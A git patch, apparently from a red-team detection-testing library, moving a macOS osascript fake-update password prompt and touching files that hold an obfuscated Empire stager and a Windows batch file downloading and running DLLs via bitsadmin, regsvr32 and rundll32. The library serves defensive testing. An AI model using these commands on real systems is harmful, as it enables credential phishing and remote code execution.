From dce29fd24d13d4e92ba7dbe9ec0d430833869e6b Mon Sep 17 00:00:00 2001
From: atmathis <adam.mathis@redcanary.com>
Date: Fri, 29 Dec 2017 12:12:54 -0500
Subject: [PATCH] Add/Change Mac and All the Things cleanup

Created Mac/Credential_Access/Input_Prompt
Added AppleScript password prompt to Credential Access/Input Prompt
Cleanup Mac/Execution/AppleScript
Updated Mac Grid
Updated formatting on AllTheThings test.bat
---
 Mac/Credential_Access/Input_Prompt.md  | 10 ++++++++++
 Mac/Execution/AppleScript.md           |  7 -------
 Mac/README.md                          |  2 +-
 Windows/Payloads/AllTheThings/test.bat |  3 +++
 4 files changed, 14 insertions(+), 8 deletions(-)
 create mode 100644 Mac/Credential_Access/Input_Prompt.md

diff --git a/Mac/Credential_Access/Input_Prompt.md b/Mac/Credential_Access/Input_Prompt.md
new file mode 100644
index 0000000..b2f7e19
--- /dev/null
+++ b/Mac/Credential_Access/Input_Prompt.md
@@ -0,0 +1,10 @@
+# Input Prompt
+
+MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
+
+
+### Prompt User for Password (Local Phishing)
+
+    osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
+
+http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
diff --git a/Mac/Execution/AppleScript.md b/Mac/Execution/AppleScript.md
index a8d17b5..7ee3033 100644
--- a/Mac/Execution/AppleScript.md
+++ b/Mac/Execution/AppleScript.md
@@ -9,10 +9,3 @@ MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
     osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
 
 https://github.com/EmpireProject/Empire
-
-
-### Prompt User for Password (Local Phishing)
-
-    osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
-
-http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
diff --git a/Mac/README.md b/Mac/README.md
index 0a178e7..edc34f9 100644
--- a/Mac/README.md
+++ b/Mac/README.md
@@ -9,7 +9,7 @@
 | Hidden Files and Directories | Plist Modification            | Disabling Security Tools      | Credentials in Files                   | Network Share Discovery                | Logon Scripts                   | Launchctl                | Data from Local System         | Data Transfer Size Limits                     | Custom Command and Control Protocol     |
 | LC_LOAD_DYLIB Addition       | Setuid and Setgid             | Exploitation of Vulnerability | Exploitation of Vulnerability          | Permission Groups Discovery            | Remote File Copy                | Scripting                | Data from Network Shared Drive | Exfiltration Over Alternative Protocol        | Custom Cryptographic Protocol           |
 | Launch Agent                 | Startup Items                 | File Deletion                 | Input Capture                          | Process Discovery                      | Remote Services                 | Source                   | Data from Removable Media      | Exfiltration Over Command and Control Channel | Data Encoding                           |
-| Launch Daemon                | Sudo                          | Gatekeeper Bypass             | Input Prompt                           | Remote System Discovery                | Third-party Software            | Space after Filename     | Input Capture                  | Exfiltration Over Other Network Medium        | Data Obfuscation                        |
+| Launch Daemon                | Sudo                          | Gatekeeper Bypass             | [Input Prompt](Credential_Access/Input_Prompt.md)                           | Remote System Discovery                | Third-party Software            | Space after Filename     | Input Capture                  | Exfiltration Over Other Network Medium        | Data Obfuscation                        |
 | Launchctl                    | Valid Accounts                | HISTCONTROL                   | Keychain                               | Security Software Discovery            |                                 | Third-party Software     | Screen Capture                 | Exfiltration Over Physical Medium             | Fallback Channels                       |
 | Login Item                   | Web Shell                     | Hidden Files and Directories  | Network Sniffing                       | System Information Discovery           |                                 | Trap                     |                                | Scheduled Transfer                            | Multi-Stage Channels                    |
 | Logon Scripts                |                               | Hidden Users                  | Private Keys                           | System Network Configuration Discovery |                                 |                          |                                |                                               | Multiband Communication                 |
diff --git a/Windows/Payloads/AllTheThings/test.bat b/Windows/Payloads/AllTheThings/test.bat
index 6ccad68..5238501 100755
--- a/Windows/Payloads/AllTheThings/test.bat
+++ b/Windows/Payloads/AllTheThings/test.bat
@@ -5,6 +5,7 @@ bitsadmin.exe /transfer "ATT" https://github.com/redcanaryco/atomic-red-team/raw
 timeout /t 1 /nobreak > NUL
 bitsadmin.exe /transfer "ATT" https://github.com/redcanaryco/atomic-red-team/raw/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll C:\Temp\AllTheThingsx86.dll
 timeout /t 1 /nobreak > NUL
+
 REM X86
 Executing X86 AllTheThings Test
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
@@ -13,6 +14,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
 regsvr32.exe /s /u AllTheThingsx86.dll
 regsvr32.exe /s AllTheThingsx86.dll
 rundll32 AllTheThingsx86.dll,EntryPoint
+
 REM AMD64
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
@@ -20,5 +22,6 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dl
 regsvr32.exe /s /u AllTheThingsx64.dll
 regsvr32.exe /s AllTheThingsx64.dll
 rundll32 AllTheThingsx64.dll,EntryPoint
+
 REM Cleanup
 del C:\Temp\AllTheThings*